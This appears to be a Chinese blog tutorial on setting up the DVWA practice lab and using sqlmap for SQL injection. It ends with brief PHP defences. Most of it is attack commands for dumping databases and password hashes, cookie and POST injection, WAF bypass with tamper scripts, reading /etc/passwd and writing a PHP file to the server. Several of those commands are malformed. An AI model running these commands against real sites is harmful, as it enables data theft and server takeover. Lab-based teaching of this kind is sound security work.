1.首先得安装python2.7然后下载sqlmap源码之后配置环境变量 cmd进入命令行,输入sqlmap.py回车,安装成功
2.搭建测试环境
---------1.php运行环境
---------2.www.dvwa.co.uk ,下载dvwa源码(测试源码)解压到web运行目录
<VirtualHost *:80>
ServerName dvwa.localhost
ServerAlias localhost
DocumentRoot F:/wamp/www/DVWA-master
<Directory "F:/wamp/www/DVWA-master">
Options +Indexes +Includes +FollowSymLinks +MultiViews
AllowOverride All
Require local
</Directory>
</VirtualHost>
以上是修改appache的配置
-------------3.配置虚拟域名C:\Windows\system32\drivers\etc
127.0.0.1 dvwa.localhost 之后在cmd ping dvwa.localhost
-------4.修改F:\wamp\www\DVWA-master\config 添加数据库账号 密码
--------5.登陆账号 密码 admin password
3.sqlmap使用
python sqlmap.py -u 地址 可以查看是否能对当前URL进行注入
python sqlmap.py -u 地址 -v 1 --dbs // 列举数据库列表
python sqlmap.py -u 地址 -v 1 --current-db// 显示当前数据库
python sqlmap.py -u 地址 -v 1 --users // 列举所有数据库用户
python sqlmap.py -u 地址 -v 1 --current-user // 显示当前用户
python sqlmap.py -u 地址 -v 1 -D "database_name" --tables // 列举databas的所有表
python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" --columns // 列举所有字段
python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" -C"columns1,columns2" –dump //导出相关字段
而且SQLMAP会将数据存储在sqlmap/output/
post注入:
先用抓包工具把post的内容拷贝到文件里面去,命名为post.txt
python sqlmap.py -r post.txt -p "user_name,pass"
-r 是指定post请求的文件
-p 是注入需要提交的参数
也可以利用下面的方式进行post注入
python sqlmap.py -u 地址 --forms //自动判断注入
python sqlmap.py -u 地址 --data "指定参数"
3.cookie注入:
如果POST跟GET请求注入都失败的话,可以尝试cookie注入试下。当使用–level 参数>=2的时候sqlmap会检查cookie的参数,先将cookie的信息从请求中复制下来
python sqlmap.py -u 地址 --cookie "参数" --tables --level 2
4.绕过waf防火墙:
假设我们在注入相关地址的时候碰到防火墙可以利用如下方式绕过防火墙
python sqlmap.py -u 地址 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
在sqlmap 的 tamper目录下有很多py 编码脚本自行加载
5.下面是几个常用实例:
1.读取数据库版本,当前用户,当前数据库
python sqlmap -u 地址 -f -b –current-user –current-db -v 1
2.判断当前数据库用户权限
python sqlmap -u 地址 –privileges -U 用户名 -v 1
python sqlmap -u 地址 –is-dba -U 用户名 -v 1
3.读取所有数据库用户或指定数据库用户的密码
python sqlmap -u 地址 –users –passwords -v 2
python sqlmap -u 地址 –passwords -U root -v 2
4.file-read读取web文件
python sqlmap -u 地址 –file-read “/etc/passwd” -v 2
5.file-write写入文件到web
python sqlmap -u 地址 –file-write /localhost/mm.php –file-dest
那么我们如何对SQL注入进行防护呢(这边是针对PHP的)
如果数据库驱动支持PDO或者mysqli的话可以使用绑定参数的方式来直接避免SQL注入
如果数据库驱动只支持mysql的话字符串可以使用mysql_real_escape_string来过滤,如果为其他类型的话直接强制转化(如int)这样就能避免大部分SQL注入。